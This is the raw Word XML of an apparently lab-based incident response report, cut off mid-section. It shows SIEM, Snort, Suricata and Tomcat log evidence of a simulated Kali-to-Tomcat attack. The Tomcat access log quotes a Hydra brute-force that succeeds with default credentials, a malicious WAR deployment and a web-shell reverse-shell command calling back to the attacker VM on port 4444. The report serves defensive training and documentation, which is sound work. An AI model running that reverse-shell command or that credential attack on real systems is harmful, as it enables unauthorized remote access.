              <w:t xml:space="preserve">8 — Containment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02:58–06:58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Analyst isolates Tomcat VM (pfSense block alias), removes shell.war, resets Tomcat credentials, removes WAR, restores from snapshot — full containment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pfSense alias update log; Tomcat Manager deploy log; VM snapshot restore record</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5. Log Evidence and Alert Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Wazuh SIEM: P1 Incident Alert Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following represents the Wazuh SIEM alert dashboard at 02:42 UTC, immediately after INC-JLR-LAB-2026-0312 was auto-generated by correlated rule 100441. This constitutes the primary detection artefact for the incident.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9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">[ WAZUH SIEM — ALERT DASHBOARD  |  JLR LAB SOC  |  2026-03-18 02:42 UTC ]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">═══════════════════════════════════════════════════════════════════════════</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ALERT ID              TITLE                                    LVL  STATUS   AGENTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">───────────────────────────────────────────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0312 P1: Port Scan+WAR Deploy+OT Probe+C2    L12  NEW      3 VMs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0308 Hydra brute-force — Tomcat Manager      L10  ACTIVE   Tomcat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0301 Suricata block — repeated C2 port 4444  L12  ACTIVE   pfSense</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-LAB-2026-0289 pfSense deny storm — non-app port scan  L8   CLOSED   pfSense</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">───────────────────────────────────────────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Rules Fired:   100441 (multi-source)  100442 (brute-force)  100443 (WAR)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">                      100444 (OT probe)       100445 (C2 beacon)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP:            192.168.100.50 (Kali VM)  [BLOCKED — Suricata pf table]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Target IP:            192.168.100.10 (Tomcat)   [ISOLATED — pfSense block alias]</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5.2 Wazuh Incident Detail — INC-JLR-LAB-2026-0312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Incident ID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INC-JLR-LAB-2026-0312</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Created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2026-03-18T02:41:07Z (auto-generated by Wazuh rule 100441 multi-source correlation)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bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Level 12 — Critical (Wazuh maximum severity)</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Rules Fired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100441 (multi-source), 100442 (brute-force), 100443 (WAR deploy), 100444 (OT probe), 100445 (C2 beacon)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Agents / VMs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pfSense (syslog), Apache Tomcat (Wazuh agent), Wazuh manager (Suricata EVE)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Source IP</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192.168.100.50 (Kali Linux VM — attacker)</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Target IP</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192.168.100.10 (Apache Tomcat VM — CUI-equivalent target)</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MITRE ATT&amp;CK</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T1595 Active Scanning  |  T1110 Brute Force  |  T1505.003 Web Shell  |  T1059 Command Execution  |  T1046 Network Discovery</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NIST Category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CAT-2: Unauthorized Access  |  CAT-5: Malicious Code (WAR/web shell)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Auto-Action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Wazuh active response: iptables block on Kali IP (192.168.100.50) applied to Tomcat agent — inbound blocked at host</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5.3 Log Evidence — Snort IDS: Reconnaissance Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Snort IDS alert represents the earliest indicator of compromise — a TCP SYN port scan from the Kali VM targeting the Tomcat server, triggering Wazuh rule 100441 as the first detection source.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569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">=== SNORT IDS ALERT — pfSense LAN Interface =========================</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp    : 2026-03-18T02:03:14.841Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule SID     : 9000001  |  Rev: 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule Msg     : COLLINS-LAB-IDS Port Scan Detected -- Kali to Tomcat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification: network-scan  |  Priority: 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP    : 192.168.100.50  (Kali Linux VM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Port  : [random high ports — 52841, 52842 ... 52871+]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP      : 192.168.100.10  (Apache Tomcat VM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Ports   : 22, 25, 53, 80, 102, 443, 445, 1099, 8080, 8443, 8009...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol     : TCP  |  Flags: SYN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection    : 27 SYN packets in 4.2 seconds from 192.168.100.50</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Threshold    : Triggered at count=20 in 5 seconds (rule SID:9000001)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert Output : Forwarded to Wazuh SIEM via syslog UDP/514</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh Event  : INC-JLR-LAB-2026-0312  |  Rule 100441 (partial match — awaiting corroboration)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">pfSense Log  : /var/log/snort/snort_LAN*.log  |  Unified2 format</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Suricata     : Parallel SID 9100001 DROP fired at packet count=25 (61ms later)</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5.4 Log Evidence — Apache Tomcat: Brute-Force and WAR Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Tomcat access log entries, captured by the Wazuh agent running on the Tomcat VM, document the Hydra credential brute-force attack and the subsequent malicious WAR file deployment — the lab equivalent of the JLR scenario's LSASS credential dump and lateral movement via compromised service account.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569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">=== APACHE TOMCAT ACCESS LOG — 192.168.100.10 (Wazuh Agent) ========</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Log: /opt/tomcat/logs/localhost_access_log.2026-03-18.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Phase 1 — Hydra brute-force (312 attempts, ~90 seconds)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:11:52 +0000] "GET /manager/html HTTP/1.1" 401 2536</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:11:52 +0000] "GET /manager/html HTTP/1.1" 401 2536</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:11:53 +0000] "GET /manager/html HTTP/1.1" 401 2536</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  [... 309 additional 401 responses omitted — Wazuh rule 100442 fired at attempt #21 ...]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:13:24 +0000] "GET /manager/html HTTP/1.1" 200 14438</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  # ^^^ SUCCESS — credential tomcat:tomcat accepted — Wazuh ALERT L10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Phase 2 — WAR file deployment via Tomcat Manager API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:17:33 +0000] "POST /manager/text/deploy?path=/shell&amp;war=file:/tmp/shell.war HTTP/1.1" 200 57</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  # ^^^ CRITICAL — WAR deployed — Wazuh rule 100443 CRITICAL L12 fired</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  # Response body: OK - Deployed application at context path [/shell]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Phase 3 — Web shell accessed and reverse shell triggered</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:17:41 +0000] "GET /shell/cmd.jsp?cmd=id HTTP/1.1" 200 42</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:17:45 +0000] "GET /shell/cmd.jsp?cmd=whoami HTTP/1.1" 200 16</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.50 - - [18/Mar/2026:02:28:47 +0000] "GET /shell/cmd.jsp?cmd=bash+-i+&gt;%26+/dev/tcp/192.168.100.50/4444+0&gt;%261 HTTP/1.1" 200 0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">  # ^^^ Reverse shell payload executed — Suricata SID 9100003 DROP on TCP/4444</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5.5 Log Evidence — Suricata IPS: C2 Beacon Blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Suricata EVE JSON alert confirms the inline IPS blocked the reverse shell callback from the Tomcat VM to the Kali netcat listener — the lab equivalent of Darktrace Antigena's autonomous C2 block in the enterprise scenario.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569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">=== SURICATA IPS EVE JSON ALERT — pfSense LAN Interface (Inline) ===</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp    : 2026-03-18T02:28:47.902Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Action       : DROP  (packet silently discarded — pfSense pf block table updated)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">               Source IP 192.168.100.10 added to Suricata block table (outbound C2)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule SID     : 9100003  |  Rev: 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule Msg     : COLLINS-LAB-IPS BLOCK Suspected C2 Beacon -- Tomcat Reverse Shell Port</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification: trojan-activity  |  Priority: 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP    : 192.168.100.10  (Apache Tomcat VM — compromised)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Port  : 49221</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP      : 192.168.100.50  (Kali Linux VM — attacker netcat listener)</w:t>
            </w:r>
          </w:p>
          <w:p>
